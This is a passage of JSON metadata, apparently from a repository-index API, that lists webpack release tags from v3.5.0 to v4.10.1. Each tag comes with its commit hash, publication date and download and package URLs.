22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.